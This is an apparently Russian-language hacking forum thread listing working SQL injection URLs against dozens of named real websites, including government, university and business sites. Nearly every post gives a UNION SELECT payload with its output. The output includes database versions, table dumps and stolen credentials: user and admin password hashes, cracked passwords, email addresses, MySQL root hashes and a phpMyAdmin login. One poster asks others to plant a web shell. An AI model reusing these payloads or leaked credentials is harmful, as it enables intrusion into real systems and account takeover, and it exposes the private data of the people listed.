SQL Инъекции

http://www.hr-forum.kz/news.php?id=-10+union+select+1,2,3,concat_ws(0x2f,user(),version(),database())/*
hrforumk_root@localhost/4.1.22-standard/hrforumk_hr
-----------------------------------------------------------------------
http://www.alians.kz
http://www.alians.kz/news.php?p=11&id=-60+union+select+1,2,3,4,CONVERT(table_name+using+latin1),6+from+information_schema.tables/*
Все таблицы...но на страницы поддерживаются не все, так что дольше через limit
http://www.alians.kz/news.php?p=11&id=-60+union+select+1,2,3,4,CONVERT(column_name+using+latin1),6+from+information_schema.columns+limit+4,50/*
Все колонки...но на страницы поддерживаются не все, так что дольше через limit
-----------------------------------------------------------------------
http://www.artbox.cz/news.php?id=-17+union+select+1,2,3,4,5,6,7,8,concat(login,char(58),pass),10+from+users/*
administrator:d41d8cd98f00b204e9800998ecf8427e:<no password>
-----------------------------------------------------------------------
http://etteam.avonet.cz/news.php?id=-88+union+select+1,2,3,4,5,6,7,8,9+from+admin/*
Поля не подобрал((
-----------------------------------------------------------------------
http://www.adatio.cz/news.php?id=-12+union+select+1,2,3,table_name+from+information_schema.tables/*
Все таблицы
http://www.adatio.cz/news.php?id=-12+union+select+1,2,3,column_name+from+information_schema.columns/*
Все колонки
-----------------------------------------------------------------------
http://www.diazivot.cz/news.php?id=-37+union+select+1,2,3,4,5,concat_ws(0x2f,user(),version(),database()),7,8,9/*
-----------------------------------------------------------------------
http://www.krd.cz/news.php?id=-72+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
-----------------------------------------------------------------------
tyma@localhost/4.1.20-log/tyma
-----------------------------------------------------------------------
http://carbon.hotgames.cz/news.php?id=-54+union+select+1,2,3,4,5,6,7,concat_ws(0x2f,user(),version(),database())/*
[email protected]/5.0.45-log/carbon_hotgames_cz
Все таблицы:
http://carbon.hotgames.cz/news.php?id=-54+union+select+1,2,3,4,5,6,7,table_name+from+information_schema.tables/*
Все колонки:
http://carbon.hotgames.cz/news.php?id=-54+union+select+1,2,3,4,5,6,7,column_name+from+information_schema.columns/*
-----------------------------------------------------------------------
http://www.protocolservice.cz/news.php?id=-1146736800+union+select+1,2,3,4,5,6+from+user/*
Поля не подобрал
-----------------------------------------------------------------------
http://www.hczralocivyskov.cz/news.php?id=35+union+select+1,2,3,concat_ws(0x2f,user(),version(),database()),5,6,7,8/*
[email protected]/4.1.14-Debian_3/db4871_hczv

 

www.agroelsalvador.com

полностю раскрученная
http://www.agroelsalvador.com/phpmyadmin
mag:mag112

 

http://www.networkofdisclosure.com/

HTML:

http://www.networkofdisclosure.com/latest_news.php?news_id=-26+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4/*

5.0.45-community:networko_user@localhost:networko_db

HTML:

http://www.networkofdisclosure.com/latest_news.php?news_id=-26+UNION+SELECT+1,2,concat_ws(0x3a,user_id,username,user_password),4+FROM+users+LIMIT+10,1/*

4:Jay Fishman:bf4cf16ad122a0cdc77b3c84b637219f::f1shman
5:Brad Hamann:00cdb7bb942cf6b290ceb97d6aca64a3:: password7
7:Brent Moeshlin:7c3d0453108aefa46c07e91c8bc031d3:: officer1
9:Court Eilertson:6db6339dbf5ebc3ce4b1af93a8dfec58::count1

HTML:

http://www.networkofdisclosure.com/latest_news.php?news_id=-26+UNION+SELECT+1,2,concat_ws(0x3a,member_id,email,password),4+FROM+member+LIMIT+7,1/*

27:[email protected]:bf4cf16ad122a0cdc77b3c84b637219f::f1shman
7:[email protected]:7c3d0453108aefa46c07e91c8bc031d3:: officer1
9:[email protected]:6db6339dbf5ebc3ce4b1af93a8dfec58::count1
2:[email protected]:f1c943880885e79825464b0f86f80f6e::424344

С мейл:пас сюда: http://www.networkofdisclosure.com/login.php,
а там можно еще зайти под тем же логином на форум. Кнопка Member's Forum.

 

Прошу прощения если боян,на форуме не нашел скуль с этим сайтом


http://www.5ballov.ru/vacansy.php?salary_min=null+union+select+1,2,3,4,5,6,7,concat(table_name,0x3a,column_name),9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns/*
вывод-все сразу



http://www.5ballov.ru/vacansy.php?salary_min=null+union+select+1,2,3,4,5,6,7,count(0x3a,name,nick,log,pas,email),9,10,11,12,13,14,15,16,17,18,19,20+from+users/*

единственная таблица с интересным юзеров больше 20000

 

http://guvd72.ru/index.php?module_name=news&action=show_full&id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4/*

4.1.22-standard-log/guvd72r_db/guvd72r_user@localhost
-----------------------------------------------------------------------------

http://www.energots.ru/ru/?publication=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7/*

4.0.26-log/udb921/Uwww921S@localhost
-----------------------------------------------------------------------------

showbizer.com


http://ru.showbizer.com/news_firm.php?id_news=-1'+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9,10,11,12/*

5.0.45-log/showbiz/showbiz@localhost


http://ru.showbizer.com/news_firm.php?id_news=-1'+union+select+1,2,3,4,concat_ws(0x2F,login,password,e_mail),6,7,8,9,10,11,12+from+sb_firms+limit+1,1/*

логин/пароль/мейл
aviator/8196/[email protected]

 

Code:

http://www.rodina.by/book/info/go/-83181%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2%20from%20accounts/*.html

Code:

http://www.rodina.by/book/info/go/-83181%20union%20select%201,name,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2%20from%20members/*.html

 

http://www.metrovalencia.gob.ve/ Метро Венесуэлы=)

Code:

http://www.metrovalencia.gob.ve/contenido.php?id=-1'+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),database(),version()),0x78),0x78),8,9,10,11,12,13,14,15,16,17,18/*

http://www.mes.gov.ve/ Министерство Высшего Образования Венесуэлы

Code:

http://www.mes.gov.ve/informa/noticias.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8/*

http://inforc.org.ve/ Национальный Институт Дополнительного Высшего Образования Венесуэлы

Code:

http://inforc.org.ve/detalle_evento.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

 

2Ded MustD!e: А Венесуэла это где? =\
http://nhia.edu

БД 4. Таблицы не удалось подобрать, админка в стандартной /admin/.
http://knigki.ru/

Извращенцы. Всякие тупые порно рассказы, БД 5.

 

http://www.mdnationwide.tv/news.php?submit_action=article&nid=-1+union+select+1,concat_ws(0x2f,version(),user(),database()),3,4,5,6/*
4.1.20/mdnationwidetv@localhost/mdnationwidetv
-----------------------------------------------------------------------
Все таблицы:
http://www.punjabtv.tv/news.php?id=-3552+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables/*
Все колонки
http://www.punjabtv.tv/news.php?id=-3552+union+select+1,column_name,3,4,5,6,7,8,9+from+information_schema.columns/*
Есть полезные таблицы:
user
users
Колонки ищите сами))
-----------------------------------------------------------------------
http://library.tc.columbia.edu/news.php?id=208'
Извините за пост...В MsSQL не раздираюсь...вот вам...вы разберетесь))
-----------------------------------------------------------------------
http://wolfpack.loyno.edu/news.php?action=view&id=-1270+union+select+1,CONVERT(concat_ws(0x3a,version(),user(),database())+using+latin1),3,4,5/*
4.1.12-standard-log:klein@localhost:wolfpack
-----------------------------------------------------------------------
http://www.entrepreneurship.appstate.edu/news.php?id=-46+union+select+1,concat_ws(0x2f,version(),user(),database()),3,4,5,6/*
4.1.20/entrepreneur@localhost/entrepreneur
-----------------------------------------------------------------------
http://www.eng.wayne.edu/news.php?id=-852+union+select+1,2,3,pwd,5,6,7,8,9,10,11,12,13+from+users/*
Колонки не подобрал
-----------------------------------------------------------------------
Все таблицы:
http://www.multimedia.edu/news.php?id=-7+union+select+1,2,table_name,4,5+from+information_schema.tables/*
Все колонки:
http://www.multimedia.edu/news.php?id=-7+union+select+1,2,column_name,4,5+from+information_schema.columns/*
-----------------------------------------------------------------------
http://vl2.gallaudet.edu/news.php?id=-20+union+select+1,2,concat(user,char(58),password),4,5,6,7,8,9,10,11+from+mysql.user/*
root:*90B8B931F28082EF4AD1DA2A8787314B0A4246AA

 

avtomir.ru - Группа компаний Автомир, крупнейший автомобильный дилер в России

Code:

http://www.avtomir.ru/ru/news/index.php?id4=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15/*

4.1.22:avtomir-www:avtomir-www@localhost

Нашёл табу ADMINISTRATOR с полями LOGIN и EMAIL

 

http://www.akata.fr/news.php?id=-176+union+select+1,concat_ws(0x2f,version(),user(),database()),3,4,5,6,7,8,9,10/*
4.0.17-standard-log/[email protected]/akatav2
-----------------------------------------------------------------------
http://www.internazionale.fr/news.php?id=-1529+union+select+1,concat_ws(0x2f,version(),user(),database()),3,4,5,6,7,8,9/*
4.1.22-log/internazionale@localhost/interklan
-----------------------------------------------------------------------
http://www.logiconfor.fr/news.php?id=-19+union+select+1,2,concat_ws(0x2f,version(),user(),database()),4/*
5.0.44-log/[email protected]/logiconf001
-----------------------------------------------------------------------
http://www.sequant.com/sn/news.php?id=-22+union+select+1,2,3,concat_ws(0x2f,version(),user(),database()),5,6/*
4.1.21-Max/[email protected]/db1015325_sequant
-----------------------------------------------------------------------
http://sever.co.il
http://sever.co.il/news.php?id=-78+union+select+1,2,3,concat(user,char(58),password),5,6,7,8,9+from+mysql.user/*
root:*1611455133BEB42BD070C44CBDCDCAEDB73E9156
Дальше можно через лимит...например: http://sever.co.il/news.php?id=-78+union+select+1,2,3,concat(user,char(58),password),5,6,7,8,9+from+mysql.user+limit+1,50/*
Все таблицы:
http://sever.co.il/news.php?id=-78+union+select+1,2,3,table_name,5,6,7,8,9+from+information_schema.tables+limit+15,100/*
Все колонки:
http://sever.co.il/news.php?id=-78+union+select+1,2,3,column_name,5,6,7,8,9+from+information_schema.columns+limit+15,100/*
-----------------------------------------------------------------------

 

vimkon.ru интернет-магазин

http://www.vimkon.ru/news.php3?news_id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9/*

5.0.45/vimkon/vimkon@localhost


http://www.vimkon.ru/news.php3?news_id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,login,pass,email),8,9+from+client+limit+100,1/*

логин/пароль/мейл
algis/algisf1/[email protected]

 

www.freeru.info

Code:

http://www.freeru.info/category.php/?cat1=-5 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),15,16,CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NAME),18,19,20 FROM INFORMATION_SCHEMA.TABLES/*

10-key.ru

Code:

http://10-key.ru/contests.php?mod=2' AND 1=2 UNION SELECT 1,2,3,4,CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NAME),6,7,8,9,10 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA<>'information_schema'/*

Оба сайта на одном серваке... так вот если кто нить зальет шелл, у мну например скока не пытался не получилось, буду очень признателен если вы мне об этом сообщите...
как бонус читалка хтмлок на этом же сервере:

Code:

http://olva-stroy.ru/index.php?str=

 

thefetus.net

HTML:

http://www.thefetus.net/page.php?id=-1149+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8,9,10,11,12,13/*

USER:fetus@localhost
VERSION:5.0.37-community-nt
DATABASE:thefetus

HTML:

http://www.thefetus.net/page.php?id=-1149+union+select+0,table_name,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+limit+95,100/*

- все таблици

HTML:

http://www.thefetus.net/page.php?id=-1149+union+select+0,column_name,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns/*

- все столбци

chilliwackheritagepark.com

HTML:

http://www.chilliwackheritagepark.com/page.php?id=-50+union+select+0,1,2,3,4,5,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18/*  

USER:chwk_arts@localhost
VERSION:4.1.16
DATABASE:chwk_arts

 

property-fund.ru


http://www.property-fund.ru/ru/news_show.phtml?news=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,version(),database(),user()),11,12,13,14,15/*

4.1.20/profnd/profnd@localhost


http://www.property-fund.ru/ru/news_show.phtml?news=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,username,user_password,user_email),11,12,13,14,15+from+phpbb_users+limit+1,1/*

логин/хеш/мейл
admin/21232f297a57a5a743894a0e4a801fc3/[email protected]

Юзаем http://md5.xek.cc/

21232f297a57a5a743894a0e4a801fc3;admin

 

wwwrsphysse.anu.edu.au

Code:

http://wwwrsphysse.anu.edu.au/nuclear/personnel.php?id=-50 UNION SELECT 1,2,3,CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NAME),5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA<>0x494E464F524D4154494F4E5F534348454D41/*

почти edu)))

 

http://www.democracy.ru/

Code:

http://www.democracy.ru/article.php?id=-1+UNION+SELECT+1,2,concat_ws(0x3A,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16/*

Организация ИРИС, цель которой "донести до избирателя реальные цели и задачи кандидатов, оплот демократии" (примерно так, не цитата, но смысл ясен). '99 года выпуска. Инъекция совершенно лобовая. БД 4, таблицы не подобрал.
З.Ы. Ипал я в рот такую демократию, на индексе почти все топики о "Национальном лидере России В.В. Путине". Короче очередная продажная организация.

 

alterego.tut.by
homenet.tut.by
Толком ничего не накопал,но ресурс вроде известен.
_____________
http://alterego.tut.by/library/showarticle.php?id=-65%20UNION%20SELECT%201,version(),user(),database(),5,6/*
_____________
http://homenet.tut.by/?action=notes&id=24471' - тут вообще нихрена не копается =\
_____________
P.S. Не судите строго,в хокинге я пока новичок.Да и ламарез в мск сьебался - некому учить =(

 

Тут нет инжекции(

tgao.ca

HTML:

http://www.tgao.ca/page.php?id=-9+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3/*

USER:tgao_tgao2@localhost
VERSION:5.0.27-standard
DATABASE:tgao_tgao2

HTML:

http://www.tgao.ca/page.php?id=-9+union+select+0,1,table_name,3+from+information_schema.tables+limit+45,1/*

HTML:

http://www.tgao.ca/page.php?id=-9+union+select+0,1,column_name,3+from+information_schema.columns+limit+0,1/*

lucon.ru

HTML:

http://www.lucon.ru/page.php?lev1=20+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),6,7,8,9/*

USER:lucon1@localhost
VERSION:5.0.24-standard
DATABASE:db_lucon1

HTML:

http://www.lucon.ru/page.php?lev1=20+union+select+0,1,2,3,4,table_name,6,7,8,9+from+information_schema.tables/*

- все таблици

HTML:

http://www.lucon.ru/page.php?lev1=20+union+select+0,1,2,3,4,column_name,6,7,8,9+from+information_schema.columns/*

- все поля

alex-travel.ru

HTML:

http://www.alex-travel.ru/strana.php?strana=2+union+select+0,1,2,3,4,5,6,7,8,9,10,11/*

 

www.api.org.il

5.0.32-Debian_7etch3-log
root:*1611455133BEB42BD070C44CBDCDCAEDB73E9156:l1n22q
http://www.api.org.il/admin/index.php
есть только пасс от рута базы (l1n22q) ... логин подобрать с админке не могу ... авось и пасс другой ((
есть таблы (users,adm_users) итд ... но в них не попасть или я сильно туплю...